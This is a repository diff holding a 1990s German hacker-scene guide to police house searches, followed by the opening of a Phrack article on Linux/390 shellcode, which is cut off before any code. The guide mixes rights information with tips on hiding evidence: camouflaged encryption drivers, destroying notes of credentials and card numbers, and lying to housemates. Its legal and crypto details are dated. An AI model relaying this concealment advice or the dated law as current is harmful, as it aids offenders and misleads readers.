+Verhaeltnis von Freiheit und Sicherheit nicht willkuerlich sondern durch 
+"das Recht" festgelegt wird. Das bedeutet, dass keine Staatsgewalt im 
+Widerspruch zum schriftlich festgelegtem Gesetz handeln darf. Dass dies 
+nicht immer so ist, liegt auf der Hand, aber bevor du dich dagegen wehren 
+kannst, musst du erst erkennen wo gueltiges Recht ueberschritten wurde - 
+hier gilt Wissen ist Macht. Fuer Juristen unter euch, uns wird hier am 
+meisten das Grundgesetz (Art. 13) und die Strafprozessordung (StPO, Par. 110) 
+interessieren.
+
+Wie ich oben schrieb, garantiert der Staat per Gesetz jedem Buerger Sicherheit 
+zu. Wenn sich also jemand (eine Privatperson oder eine Firma) in seinen
+Rechten verletzt meint (Diebstahl, Erschleichen von Dienstleistungen, Sach-
+beschaedigung, Verletzung des Copyrights), hat er das Recht den vermeintlichen
+Verursacher bei der Polizei, oder der Staatsanwaltschaft anzuzeigen; wenn der 
+Verursacher nicht bekannt ist, kann Anzeige "gegen unbekannt" gestellt werden.
+
+Jetzt kommt der Staat zum Zug, er kann ein Ermittlungsverfahren (EV) einleiten
+oder auch nicht. Damit wir schneller vorankommen, nehmen wir an ein
+Ermittlungsverfahren ist eingeleitet worden. Das EV hat zum Zweck hinreichende
+Beweise zu finden, um eine Anklage vor Gericht zu erheben, denn ohne einen
+Schuldspruch des Richters kann der tatsaechliche Verursacher nicht zur 
+Verantwortung gezogen werden (auch hier Prinzip des Rechtsstaats).  
+
+Waehrend des EV hat der Staat (Polizei, Kripo) eine ganze Palette an Mitteln
+um den oder die Verursacher zu finden und/oder zu ueberfuehren. Er kann 
+abhoeren, beschatten, verdeckte Ermittler einsetzen oder auch eine Hausdurch-
+suchung beim vermeintlichen Verdaechtigen oder einem seiner vermeintlichen 
+Komplizen anordnen. Da sind wir also endlich beim interessanten Teil 
+angelangt.
+
+Wann sind in einem EV genug Beweise/Hinweise gefunden wurden, dass einer
+Hausdurchsuchung stattgegeben wird?
+Leider, leider: Sehr sehr schnell. Schon wenn einer bei einer Vernehmung
+sagt, dass er gehoert hat dass jemand mal mit dem aktuellen Fall irgendwie
+zu tun hatte kann das schon fuer einen Hausdurchsuchungsbefehl reichen.
+Es gibt auch Faelle, in denen einfach eine aufgeschriebene Telefonnummer,
+die Zusammenhangslos bei einer Hausdurchsuchung gefunden wurde schon zu
+einem Besuch der Kripo gefuehrt haben.
+Grundsaetzlich: Schon der kleinste, nichtigste Anhaltspunkt kann von den
+Beamten dem Richter so vorgefuehrt werden, dass er den Wisch ausstellt!
+Also wiegt euch nicht in Sicherheit - es kann jeden immer treffen!
+In besonders krassen Faellen, wo der Verfassungschutz z.B. linke Buchlaeden
+oberserviert hatte wurden Menschen dann geziehlt observiert und abgehoert
+(und spaeter Durchsucht selbstverstaendlich) die auch nur 2x dort haben
+Blicken lassen.
+
+Die Hausdurchsuchung (im weiteren mit HD abgekuerzt) hat zum Ziel Beweise 
+oder Indizien fuer die Aufklaerung einer Straftat und eine evtl. folgende 
+Anklage zu finden. Ihr Ziel ist es *nicht* den Buerger einzuschuechtern, 
+deswegen gilt im Falle einer HD:
+
+KEINE PANIK!
+  
+Eine Hausdurchsuchung ist nichts Schlimmes, sondern nur die Erfuellung deiner
+buergerlichen Pflichten. Mit Schreien (deine Mutter), Toben, Bruellen und mit
+aggressivem wie ohnmaechtigem Verhalten machst du es nur den Polizeibeamten
+(meistens in zivil) schwer, ihrer langweiligen Routinearbeit nachzukommen,
+beeindrucken kannst du sie damit nicht, sie werden ihren Job trotzdem tun.
+
+Jetzt gilt es klaren Verstand zu bewahren und keine unnoetigen Fehler zu 
+machen, am besten wenn du deine Familie im voraus aufgeklaert hast, dazu aber
+spaeter. Hinzu kommt, dass du dich gegen eine rechtmaessige HD nicht wehren
+kannst, sondern du musst sie erdulden, es sei denn du bist John Rambo.. ;)
+
+Eine Hausdurchsuchung an sich ist eine Verletzung deines grundgesetzlich
+garantierten Rechts auf Privatsphaere (GG Art.13, Abs. 1, Wortlaut: "Die
+Wohnung ist unverletzlich."), die Polizei darf also auf keinen Fall nach 
+Gutduenken deine Wohnung betreten, wenn die Beamten das unrechtmaessig tun
+wuerden, wuerden sie sich selbst des Hausfriedensbruchs strafbar machen.
+
+Da jeder Eingriff in ein Grundrecht nur durch den Richter erfolgen darf, muss
+jede HD erst durch einen Richter angeordnet werden. Er stellt den
+Hausdurchsuchungsbefehl (HDB) aus, der der Polizei die Befugnis gibt 
+entsprechend aufgezaehlte Lokalitaeten (Zimmer, ganze Wohnung, Garage, 
+Dachboden, Fahrzeug, Haus) nach Beweisen zu durchsuchen. 
+Eine Ausnahme, die s.g. "Gefahr im Verzuge", tritt ein, wenn der Umweg ueber
+den Richter einen nicht wiedergutzumachenden Zeitverlust fuer die
+Strafverfolgung bedeuten wuerde, sei es, dass ein Gefangener in deine Wohnung 
+fluechtet oder in deiner Wohnung vermutete Beweise schon wenige Stunden 
+spaeter beiseite geschafft sein koennten - in diesem Fall darf die Polizei 
+ohne Durchsuchungsbefehl handeln (wohlgemerkt, es handelt sich um eine 
+Ausnahme, die gut begruendet werden muss).
+
+Aber auch der Durchsuchungsbefehl ist kein Persilschein fuer die 
+Polizeibeamten, sie sind an strenge Bestimmungen gebunden, z.B. nachts sind
+Durchsuchungen verboten! Die Nachtzeit ist wie folgend definiert: 
+     1. April   - 30. September : 21:00 - 4:00
+und  1. Oktober - 31. Maerz     : 21:00 - 6:00.
+Natuerlich gilt auch hier die Ausnahme fuer "Gefahr im Verzuge".
+
+Wenn also die Staatsgewalt an der Tuer klingelt (meistens gegen 9-11 Uhr 
+morgens), fragst du cool (der Hausherr) nach dem Hausdurchsuchungsbefehl.
+Wenn sie einen haben, LIEST DU IHN DIR GENAU DURCH, die Beamten warten
+waehrenddessen VOR der Tuer. Aus der Lektuere erfaehrst du welche Raeume
+durchsucht werden duerfen, und welchen Zweck die Durchsuchung hat. So kannst
+du waehrend der Durchsuchung KONTROLLIEREN ob sich die Beamten an die ihnen
+durch den Richter uebertragenen Befugnisse halten. Du hast das Recht alles
+fuer dich zu protokollieren, auch wenn es nur fuer dich ist, ist es manchmal
+hilfreich.
+
+Wenn die Polizei wider Erwarten keinen schriftlichen HDB hat (bei "Gefahr im 
+Verzug"), hast du das Recht zu erfahren welcher Tat du verdaechtigt wirst und 
+zu welchem Zweck die HD stattfinden soll. 
+
+AUF KEINEN FALL DARFST DU DEINE MUENDLICHE ZUSTIMMUNG ZUR DURCHSUCHUNG GEBEN! 
+Wenn du das tust dann hast du, als freier Buerger, dich mit dem Eingriff in
+dein Grunderecht einverstanden erklaert, und die Beamten haben sich aller 
+Formalien elegant entledigt, obwohl sie keinen HDB hatten.
+
+Wenn du also keinen Durchsuchungsbefehl praesentiert bekommst musst du LAUT 
+UND DEUTLICH DER DURCHSUCHUNG WIDERSPRECHEN. Falle nicht auf die Masche 
+herein: "Sie haben doch nichts dagegen, dass wir uns etwas im Haus umsehen?" 
+oder Aehnliches. Wenn die Beamten trotzdem eine HD durchfuehren wollen, so 
+muessen sie das gegen deinen Willen tun, das kann sich spaeter als ein 
+Vorteil fuer dich erweisen. Das ist auch ein Punkt wo du auch deine
+Wohngemeinschaft aufklaeren solltest - fuer den Fall, dass du nicht daheim 
+bist. Wie du siehst, kannst du bereits hier eine potentielle Durchsuchung 
+abblocken. Du solltest, wie die Staatsgewalt auch, bei allem hoeflich aber 
+entschieden bleiben. :-)
+
+Ein paar Worte zum Sonderfall, dass nicht die Polizei sondern z.B.: das BAPT
+(Bundesamt fuer Post und Telekommunikation) wegen nicht zugelassener
+Sendeanlagen (Scanner, Amateurfunk, Ueberschreiten der Sendekraft bei 
+CB-Funk, Brenner, Betreiben von Packet-Radio auf anderen Kanaelen als 
+vorgesehen) zu Besuch kommt. Du musst sie nicht in die Wohnung lassen! Sage 
+ihnen, dass du keine solchen Anlagen betreibst, sie werden dann gehen. Wenn 
+du sie allerdings hereinlaesst, und sie finden betriebsbereite 
+Amateurfunkanlagen, fuer die du keine Lizenz hast, nehmen sie es mit, und du 
+siehst es nie mehr wieder. 
+
+Naechster Schritt, was duerfen die Beamten waehrend der HD mit deiner Wohnung 
+anstellen? Grundsaetzlich duerfen sie nur das was im HDB steht, insbesondere 
+nur aufgezaehlte Raeumlichkeiten durchsuchen. Aufraeumen muessen sie 
+allerdings nicht, sie duerfen aber keine Sachen beschaedigen. Du hast das 
+Recht bei jeder Unklarheit nachzufragen und die Beamten, an den durch
+den Richter gestellten Rahmen, zu erinnern, davon solltest du bei Bedarf
+Gebrauch machen (was stand im HDB, vs. was tun die Beamten?)! Lass dich nicht 
+voreilig entmuendigen.
+
+Vor allem hast du das Recht, eine (oder mehr) durch dich bestimmte
+Person(en), als Zeugen bei der Durchsuchung hinzuzuziehen, z.B.: einen 
+Nachbarn. Wenn kein Staatsanwalt bei der HD dabei ist (normal), dann muss
+ein Zeuge dabei sein. Oft machen sich es die Bullen einfach, und benennen
+einen Mitarbeiter als Zeugen. Seltsamerweise durchsucht er aber ebenfalls -
+was man sich nicht bieten lassen sollte. Fragt wer bei der Durchsuchung als
+Zeuge hinzugezogen ist, und dann schreitet ein wenn er sich beteiligt!
+Wenn sie einer wenig sind brauchen sie laenger und es kostet sie mehr
+Nerven - was dazu fuehrt das sie die Lust verlieren und nicht alles oder
+nicht so gruendlich durchsuchen (Praxiserfahrung ;-)
+Weiter sind deine Freiheitsrechte waehrend der Durchsuchung NICHT 
+eingeschraenkt, d.h. du darfst dich in der Wohnung FREI bewegen und
+telefonieren, z.B.: deinen Anwalt oder Freund anrufen. 
+Die Kripo sagt gerne "Bitte setzen sie sich hier hin und verhalten sie sich
+ruhig" damit man im Auge der Beamten bleibt und nicht heimlich etwas
+beseitigen kann und sie nicht stoert - wehre dich dagegen, beziehe dich auf
+die StPO!
+
+
+Zettel und Notizen
+
+Die Beamten duerfen zwar alle Gegenstaende und Schriftstuecke in der Wohnung 
+*sichten* aber keine Schriftstuecke *lesen* (Schutz der Privatsphaere). 
+Sollten sie das widerrechtlich doch tun, sagst du einfach "Entsprechend des 
+Paragraphen 110 der Strafprozessordung verbiete ich Ihnen alle gefundenen 
+Schriftsteucke zu lesen." Nur der Staatsanwalt darf sie lesen und auswerten.
+Vorsicht, wenn du die Beamten nicht selbst auf dieses Verbot hinweist, werden 
+sie spaeter sagen du waerest stillschweigend mit ihrer Handhabe einverstanden.
+Beachte hier, dass die meisten Staatsanwaelte weit weniger Verstaendnis von
+computer-relevantem Material (Passwoerter, Dialups, CCs, PBXen, Notizen, 
+sensitive Daten, 0130 Nummern) haben als inzwischen eintrainierte 
+Durchsuchungsbeamte. 
+Lass sie keine Sortierarbeit fuer den Staatsanwalt - und zu deinem Nachteil -
+machen! Schliesslich kannst du darauf bestehen, dass alle Papiere in deinem 
+Beisein versiegelt werden (empfehlenswert) - es hat zudem den Vorteil, dass
+du beim Brechen des Siegels vom Staatsanwalt selbst anwesend sein musst,
+was hilft die Auswertung der Durchsuchung zu verzoegern.
+
+
+Das Durchsuchungsprotokoll
+
+Im Falle, dass die Durchsuchungsbeamten keinen HDB hatten, darfst du nach
+der Durchsuchung eine schriftliche Mitteilung, die den Grund und die
+verdaechtige Straftat enthaelt, verlangen.
+
+Neben dieser wird auf jeden Fall ein Protokoll mit allen Daten (Personalien,
+Zeit, Liste beschlagnahmter Gegenstaende) erstellt. Die Beamten verlangen
+meistens spaeter deine Unterschrift darunter - dazu bist du aber gesetzlich
+NICHT verpflichtet, am besten laesst du es sein, ein Nachteil kann dir aus
+der Weigerung nicht gemacht werden. Auf jeden Fall hast du das Recht das
+Schriftstueck sorgfaeltig durchzulesen, und eine Erklaerung nach allem
+zu verlangen, was du nicht auf Anhieb verstehst.
+
+SEHR WICHTIG: Auf dem Protokollblatt werden an einigen Stellen Kreuze gemacht,
+die aussagen, ob der Hausherr mit der HD einverstanden war oder nicht, und ob 
+die mitgenommenen Gegenstaende *freiwillig herausgegeben* wurden oder erst
+*beschlagnahmt* werden mussten. 
+ACHTE DARAUF, dass die Kreuze bei "NICHT EINVERSTANDEN" und "NICHT 
+FREIWILLIG" stehen! Das ist deine groesste Chance die beschlagnahmten 
+Computer/Hardware/Disks jemals wiederzubekommen! Wichtig ist vor allem 
+aufzupassen was der leitende Beamte sagt! Es wird auf jeden Fall bei der 
+Ueberreichung des Zettels zum Unterschreiben der Satz kommen "Machen Sie hier 
+ein Kreuz und unterschreiben Sie da." - falle nicht darauf herein!
+
+Im allgemein beim Umgang mit der Staatsgewalt, also auch hier gilt, alles was 
+du den Polizeibeamten erlaubst, ob freiwillig oder aus deiner 
+eingeschuechterten Lage heraus und angesichts der geballten Staatsmacht, 
+braucht keiner Rechtfertigung der Polizeibeamten, also auch keiner 
+nachtraeglichen richterlichen Ueberpruefung. Falsches Zuvorkommen ist hier
+fehl am Platze und bringt dir keinerlei Vorteile!
+
+Um nochmal zu unterstreichen, wenn die Durchsuchung ohne Durchsuchungs-
+befehl stattfindet wirst du sogar ausdruecklich gefragt, ob du mit der 
+Mitnahme (Sicherstellung) der Gegenstaende einverstanden bist - DIES MUSST DU 
+UNBEDINGT VERNEINEN. Diese Haltung solltest du waehrend der gesamten 
+Durchsuchung beibehalten, um keine Missinterpretationen deines (nonverbalen) 
+Verhaltens zuzulassen!
+
+Was die evtl. mitgenommenen Gegenstaende angeht, bestehe darauf, dass alles
+auf der Liste genauestens und differenziert beschrieben ist! Um direkt aus
+einem Rechtsberater zu zitieren: "Der Betroffene hat KEINE Veranlassung, den
+Polizeibeamten die Muehe zu ersparen, die einzelnen Gegenstaende und den
+Fundort in der Wohnung so exakt wie moeglich zu beschreiben." Das ist nicht
+immer einfach aber ich ermutige dich dazu, das Gesetz ist hier eindeutig auf 
+deiner Seite.
+ 
+Deine widersprechende Haltung ist, wie ich sagte, die EINZIGE Chance
+ueberhaupt deine Hardware in annehmbarer (unter 6 Monaten) zurueckzubekommen.
+Dies geht so: wenn du widersprochen hast, muss von der Polizei innerhalb von
+drei Tagen eine Bestaetigung beim zustaendigen Amtsrichter eingeholt werden
+(egal ob ein HDB vorhanden war oder nicht). Der Richter wird also die Gruende
+fuer die bereits erfolgte HD ueberpruefen, sollten sie nicht ausreichend
+gewesen sein, muss die Polizei dir alles herausgeben. Damit nichts in
+Vergessenheit geraet, kannst du dich direkt an den zustaendigen Amtsrichter
+wenden und eine "richterliche Entscheidung ueber die Rechtmaessigkeit der
+Beschlagnahme" beantragen.
+Ausnahme bei Postsendungen auf der Post, sie sind fuer die Polizei tabu,
+beschlagnahmt werden duerfen sie nur vom Richter und bei Gefahr im Verzug nur
+vom Staatsanwalt.
+
+
+Nach der Durchsuchung
+
+Ich empfehle dir, dass du sofort, nachdem die Beamten Tschuess gesagt haben, 
+deinen Anwalt anrufst, damit er Einspruch gegen die Durchsuchung einlegen 
+kann. Sage, dass du die Computer fuer deine Arbeit dringend benoetigst. 
+Wenn die Sache gutgeht dann hast du nach 1-3 Monaten deine Hardware wieder. 
+Vereinbare mit dem Anwalt, das du ihn nach BRAGO bezahlst, das ist guenstiger
+fuer dich. Kostenpunkt ca. 500 DM im Vorverfahren, es beinhaltet alles, 
+Briefverkehr, Telefonate, Kopien etc. bis das Verfahren eroeffnet wird. 
+Nimmst du dir keinen Anwalt erhaelst du a.) keine Akteneinsicht (weisst also 
+nicht wie sie auf dich gekommen sind und bei wem sie folglich noch 
+vorbeikommen - sowie was sie bei dir gefunden haben) und b.) kann es sein,
+dass du das beschlagnahmte Material nie mehr wiedersiehst. Allemal besser 
+als dass die Sachen irgendwo als Beweise fuer Jahre verschwinden. Sollte es 
+zu einem Verfahren kommen brauchst du auf jeden Fall einen Anwalt, die Kosten 
+nach BRAGO liegen bei ca. 800-900 DM.
+
+Am besten hoerst du dich noch vor der Durchsuchung um, welcher Rechtsanwalt 
+Erfahrung hat und notierst dir seine Telefonnummer/Urlaubszeiten. Du kannst
+auch beim Ordnungsamt (beim Rathaus) nach DV-erfahrenen Anwaelten fragen. Dort
+bekommst du auch, wenn du minderbemittelt bist, einen s.g.
+Rechtsberatungsschein, der dich berechtigt, beim Anwalt deines Vertrauens 
+eine Rechtsberatung (keine gerichtliche Vertretung) einzuholen, sein Honorar 
+wird aus der Landeskasse beglichen.
+
+Ein paar Worte noch zur Aufklaerung deiner Familie. Die meisten von euch
+leben noch bei den Eltern oder in Wohngemeinschaften. Als H/P/A Dude musst
+du jederzeit mit einer Durchsuchung rechnen, auch wenn du nicht zu Hause,
+z.B. verreist, bist. Wenn du bereits eine HD hinter dir hast, kann jederzeit
+eine weitere folgen, beim begruendeten Anfangsverdacht, musst du leider mit
+allem rechnen. Sag deinen Mitbewohnern, wie sie sich bei einer HD richtig 
+verhalten sollen, du kannst sagen, dass deine Schulfreunde CDs mit raub-
+kopierter Soft gekauft haben und, dass die Hersteller jetzt eine 
+Durchsuchungswelle planen und, dass es jeden treffen kann (ziemlich unwahr-
+scheinlich aber das reicht uns hier). Sag ihnen alles nur nicht die Wahrheit. 
+Du kannst z.B. einen Zettel mit Tips an einem bekannten Ort in der Wohnung 
+deponieren, niemand weiss wie er sich im Notfall verhalten wird. Langfristige 
+mentale Vorbereitung ist notwendig. :-)
+
+Abschliessend fuege ich noch hinzu, dass du dich auf GAR KEINE Handel
+mit der Polizei einlaesst, du machst keine Teilgestaendnisse, erzaehlst von
+keinen Freunden, keinen Telefonnummern, am besten sagst du sowenig wie
+moeglich. Wenn dich waehrend der Durchsuchung ein Beamter fragt z.B. "Woher
+haben Sie die CD Roms hier?" dann nicht antworten, denn ab einer bestimmten
+Anzahl von Beamten die deine Antwort hoeren (ich glaube 3) gilt deine Antwort
+bereits als gemachte Aussage! Die Polizeibeamten sind psychologisch geschult,
+von Ablenkungsmanoevern o.Ae. rate ich dir ab. Tatsache ist, dass die Polizei
+keine Befugnisse hat dir Handel vorzuschlagen, oder Vorteile zu versprechen 
+oder gar zu garantieren, ihre Zusagen sind null und nichtig! Das Gegenteil
+ist der Fall, sie duerfen alle erlaubten (sic) Mittel anwenden um Beweise zu 
+finden und dich zu ueberfuehren. Also, ganz klare Sache, keine "Verhandlungen" 
+mit der Polizei! Sag ihnen von Anfang an sie sollen mit deinem Anwalt reden 
+und nicht mit dir.
+
+Wenn du einen Brief/Anruf bekommst zu einem Verhoer zu Erscheinen - geh' nicht
+hin, solange es keine zwingende Vorladung ist, bist du nicht verpflichtet 
+hinzugehen oder auch nur abzusagen (aus Hoeflichkeit kannst du aber trotzdem 
+absagen). Das wird besonders gerne gemacht wenn der Beschuldigte sich 
+keinen Anwalt genommen hat. Falls es zu einem Gespraech mit der Polizei kommen
+sollte - nur mit Anwalt! Wichtig ist zu wissen, dass auch wenn die Beamten 
+einem Angebote machen, wie z.B. "wenn du uns sagst wer beteiligt war etc. 
+werden wir einen Teil der Anklagepunkte weglassen" - DAS STIMMT NICHT. Die 
+Beamten koennen dir keinerlei Verguenstigungen zugestehen - sie koennen 
+naemlich gar keine machen, das kann und darf nur der Staatsanwalt. Also nichts
+anderes als eine unfaire Methode doch ein Gestaendnis von dir zu bekommen.
+
+Sollte es sogar sein, dass du nach der Durchsuchung auf die Wache mitgenommen
+wirst um "polizeilich behandelt" zu werden, mit anderen Worten Fingerabdruecke
+abnehmen, Fotos etc., dann pass auch hier wieder auf was du unterschreibst -
+lies es vorher! Ein Zettel z.B. ist vollgeschrieben mit allerlei unwichtigem
+Zeug aber versteckt steht "Ich moechte nicht (!) informiert werden, falls
+meine Daten nicht nach 2 Jahren aus den Polizeiakten geloescht werden" ...
+Das muss z.B. vorher durchgestrichen werden und explizit am Rand hinge-
+schrieben werden, dass man doch informiert werden will.
+
+Das war's diesmal, ich erhebe keinen Anspruch auf Vollstaendigkeit, ganz im
+Gegenteil, siehe diesen Text als einen kleinen Ratgeber an. Wenn du andere 
+gute Ratschlaege hast, so setze dich mit mir in Kontakt, und wir schreiben 
+ein Update fuers naechste Magazin. 
+
+
+
+
+                ***  Teil II  - Praeventivmassnahmen  ***
+
+
+Nun will man sich auch moeglichst schuetzen und vorbereitet sein, wenn man
+mal ueberraschend Besuch bekommt.
+
+*    Die Polizei ist natuerlich an den Computern interessiert wegen der 
+   Daten und Programme die sich darauf befinden. Daher sollte eine Partition 
+   der Festplatte verschluesselt werden und auf ihr alles gespeichert werden, 
+   was du fuer privat, verboten oder wichtig haeltst.
+   Empfehlenswert sind SFS 1.17 und Secure Drive 1.4a, beide frei erhaeltliche
+   Softwareloesungen und arbeiten transparent unter DOS und Windows, unter
+   Win95 allerdings nur im DOS Modus.
+   Schaue einfach im Internet danach, z.B. ftp.informatik.uni-hamburg.de
+   Fuer Unix gibt es z.B. CFS (Cryptographic File System), was sehr zu 
+   empfehlen ist. Wenn du solche Software benutzt - mach' sie nicht als solche
+   kenntlich! Du darfst nicht in Beugehaft genommen werden um das Passwort 
+   herauszugeben doch die Computer werden nicht herausgegeben wenn erkannt 
+   wird, dass verschluesselt wurde. Daher die Treiber als Maus- oder 
+   CD-ROM-Treiber tarnen, sowie keine auto-mounts oder login benutzen beim 
+   Starten des Rechners. Wer nicht so viele Daten hat, oder sie so selten 
+   benutzt, als dass er eine Partition verschluesseln will oder ein
+   Betriebssystem benutzt, das von keiner Crypt-Software unterstuetzt wird,
+   kann auch einen Filecrypter verwenden. Egal welches Cryptprogramm benutzt
+   wird, es sollten TripleDES, IDEA oder Blowfish32 als Cryptalgorithmen
+   benutzt werden, alles andere ist zu leicht zu knacken.
+   Ausserdem sollte am besten *kein* kommerzielles Programm benutzt werden,
+   besonders nicht wenn es aus den USA kommt, da solche generall Backdoors
+   haben und/oder die Schluessellaenge soweit heruntergesetzt wurde, dass ein
+   entschluesseln innerhalb kurzer Zeit moeglich ist.
+   Freeware, oder eigene geschriebene Programme die einfach Funktionsaufrufe
+   aus Crypt-Bibliotheken benutzen sind voellig ausreichend.
+   Mit PGP kann man uebrigens auch sehr sicher Dateien verschluesseln
+
+ *   Polizeibeamte interessieren sich besonders fuer allerlei Notizen - 
+   Telefonnummern, Accounts, Frequenzen ... alles was man sich gerne mal 
+   schnell notiert. Unbedingt nach jeder Session solche Zettel VERNICHTEN! 
+   Am besten solche erst gar nicht schreiben - es ist eine sehr gute
+   Angewohnheit, wenn man alles in ein Notes-file auf der Crypt-Partition
+   schreibt, statt auf Papier. Insbesondere sollte man NIE, wirklich nie
+   Telefonnummern oder Namen notieren - dies fuehrt sonst zu weiteren Durch-
+   suchungen bei den betroffenen Personen. Der Muelleimer ist das erste was
+   sich die Beamten ansehen bei einer Hausdurchsuchung! Aehnliche Gefahr kann
+   von auf Schnellwahltasten gespeicherten Telefonnummern ausgehen. 
+   Je weniger verdaechtiges Papierzeug du rumfliegen hast im Zimmer desto 
+   besser fuer dich.
+
+ *   Wichtige Kommunikation, z.B. emails, immer mit PGP verschluesseln. 
+   Trotz dummer Geruechte ist es nicht bis in die naechsten Jahre knackbar.
+   Wichtig, dass du eine genug lange und zufaellige Zeichenkette als Pass-
+   phrase hast. Wer wichtige Gespraeche machen will, kann PGP-Phone oder 
+   Nautilus dafuer verwenden, jedoch ein Pentium mit 14.4 Modem und moderner 
+   Soundblaster ist hierfuer noetig. 
+
+ *   Oft werden Daten zwischengespeichert, geloescht oder temporaere 
+   Dateien angelegt. Wie bekannt, lassen sie sich leicht wiederherstellen, 
+   z.B. mit Undelete oder mit Diskeditoren. Inzwischen ist die Technik sogar
+   soweit, dass nach 20-fachem Ueberschreiben einer Datei immer noch ein 
+   Grossteil der Daten wiederhergestellt werden kann!
+   Daher 1. Moeglichkeit, falls nicht auf Crypt-Medien zwischengespeichert 
+   wird, temporaere Daten auf Ramdisks legen, also immer TMP und TEMP darauf
+   setzen. oder 2. Moeglichkeit, sicheres ueberschreiben der Daten nach 
+   bestimmten Algorithmen. Aufgrund dieser "Sicherheitsluecke" wird es dem-
+   naechst ein THC Release geben, das ein ueberschreibendes Loeschen anbietet,
+   und, Forschungsblaettern zufolge, es unter Verwendung besonderer Loesch-
+   algorithmen, so gut wie unmoeglich macht die Daten zu restaurieren.
+   Wer Windows benutzt, sollte auch auf die (permanente) Auslagerungsdatei
+   aufpassen, am besten sie auf die Crypt-Partition legen. Unix Benutzer
+   sollten die Swappartition und das /tmp & /usr/tmp Verzeichnis nicht
+   vergessen.
+
+   Wie du dich schuetzt haengt im allgemeinen davon ab, wie wichtig du und
+   deine gesammelten Daten sind. Wenn sie wichtig genug sind, dann kannst 
+   du davon ausgehen, das der Staat/Geheimdienst keine Kosten scheuen wird um 
+   an sie mit allen verfuegbaren technischen Mitteln ranzukommen.
+
+
+
+         ***  Teil III - Kurze Zusammenfassung fuer Notfaelle  ***
+
+
+ ****************************************************************************
+       Die wichtigsten Ratschlaege bei einer Hausdurchsuchung
+ ****************************************************************************
+           
+
+1. Keine Panik. 
+
+2. Kommen die Beamten, und haben sie keinen schriftlichen Hausdurchsuchungs-
+   befehl - schicke sie hoeflich weg.
+
+3. Haben sie einen Hausdurchsuchungsbefehl, oder berufen sich auf "Gefahr 
+   im Verzug" - musst du sie hereinlassen. Davor das Papierstueck *genau* 
+   durchlesen! Und lass' sie nur das tun was drauf steht. Bei Abweichungen 
+   daran erinnern.
+
+4. Nicht einschuechtern lassen, du darfst dich frei bewegen und auch 
+   telefonieren - sofort einen Anwalt anrufen!
+
+5. Keine Fragen beantworten, lediglich die Personalien duerfen festgestellt 
+   werden. Mit den Beamten nicht reden, keine Aussagen, immer auf den Anwalt 
+   verweisen.
+
+5. WICHTIG: Was immer du auch unterschreibst, pass' darauf auf, dass immer 
+   "NICHT EINVERSTANDEN" und "BESCHLAGNAHMT" etc.. angekreuzt sind. Die Liste 
+   der Sachen die sie beschlagnahmt haben, und das Protokoll nicht 
+   unterschreiben.
+
+7. Nach der Durchsuchung den Anwalt Einspruch einlegen lassen.
+
+
+
+
+
+                  ***  Teil IV  - Literaturliste  ***
+
+
+* 'Strafanzeige und Strafprozess' (oder so aehnlich), Taschenbuch 
+  besonders empfehlenswert, (ca. 20 DM)
+
+* Die Strafprozessordnung (hier Paragraph 110) (in einer Stadt- / Uni-
+  bibliothek findest du sogar eine mehrbaendige Ausgabe mit Kommentaren.)
+
+* 'Computer und Recht', Zeitschrift, Verlag Dr. Otto Schmidt 
+
+* 'Ausgewaehlte Rechtsprobleme der Mailboxkommunikation', Dissertation
+  von Dr. Stephan Ackermann
+
+* Bericht des Sysops der BIONIC BBS ueber seine Durchsuchung, und wie er den
+  Beamten klarmachen konnte, dass sie nicht die komplette Hardware mitnehmen. 
+  (gefunden in News oder FIDO)    
+
+* 'Covering Your Tracks - Theory', von van Hauser, erschienen im THC-Magazin #3,
+  Wer sich insbesondere fuers Unix Hacking interessiert sollte es unbedingt
+  durchlesen.
+
+
+Last but not least, mein Dank gebuehrt van Hauser, fuer die 'Praeventiv-
+massnahmen' und fuer unzaehlige Gespraeche juristischer und anderer Natur. 
+
+                    ***
+
+Wenn auch DU irgendwanneinmal eine Hausdurchsuchung bei dir gehabt hast, 
+versuche ein Gedaechtnisprotokoll oder einen sachlichen Bericht darueber, und 
+mit allen fuer uns interessanten Daten anzufertigen. Veroeffentliche diesen in 
+der H/P/A Community, damit auch andere daraus lernen und gewarnt werden 
+koennen. Denke daran, die wahre Kunst ist nicht aus eigenen Fehlern zu lernen,
+sondern aus Fehlern anderer. 
+
+
+** END OF DOCUMENT **
+

Papers/linux-390-shellcode-devel.txt

@@ -0,0 +1,496 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x0d of 0x12
+
+|=----------------=[ Linux/390 shellcode development ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------=[ johnny cyberpunk <jcyberpunk@thc.org> ]=---------------=|
+
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - History and facts
+    2.1 - Registers
+    2.2 - Instruction set
+    2.3 - Syscalls
+    2.4 - The native code
+    2.5 - Avoiding the evil 0x00 and 0x0a
+    2.6 - The final code
+
+  3 - References
+
+
+
+--[ 1 - Introduction
+
+    Since Linux/390 has been released by IBM more and more b0xes of this
+type can be found in the wild. A good reason for a hacker to get a closer
+look on how vulnerable services can be exploited on a mainframe. Remember,
+who are the owners of mainframes ? Yeah, big computer centres, insurances
+or goverments. Well, in this article I'll uncover how to write the bad code
+(aka shellcode). The bind-shellcode at the end should be taken as an 
+example. Other shellcode and exploit against some known vulnerabilities can
+be found on a seperate link (see References) in the next few weeks.
+
+    Suggestions, improvements or flames can be send directly to the email
+address posted in the header of this article. My gpg-key can be found at
+the document bottom.
+
+
+--[ 2 - History and facts
+
+    In late 1998 a small team of IBM developers from Boeblingen/Germany
+started to port Linux to mainframes. One year later in December 1999 the
+first version has been published for the IBM s/390. There are two versions
+available:
+
+    A 32 bit version, referred to as Linux on s/390 and a 64 bit version, 
+referred to as Linux on zSeries. Supported distros are Suse, Redhat and
+TurboLinux. Linux for s/390 is based on the kernel 2.2, the zSeries is
+based on kernel 2.4. There are different ways to run Linux:
+
+Native       - Linux runs on the entire machine, with no other OS
+LPAR         - Logical PARtition): The hardware can be logically
+               partitioned, for example, one LPAR hosts a VM/VSE
+               environment and another LPAR hosts Linux. 
+VM/ESA Guest - means that a customer can also run Linux in a virtual
+               machine
+
+The binaries are in ELF format (big endianess).
+
+
+
+
+----[ 2.1 - Registers
+
+    For our shellcode development we really don't need the whole bunch of
+registers the s/390 or zSeries has. The most interesting for us are the
+registers %r0-%r15. Anyway I'll list some others here for to get an
+overview.
+
+General propose registers        : 
+        %r0-%r15 or gpr0-gpr15 are used for addressing and arithmetic
+        
+Control registers                : 
+        cr0-cr15 are only used by kernel for irq control, memory
+        management, debugging control ...
+        
+Access registers                 :
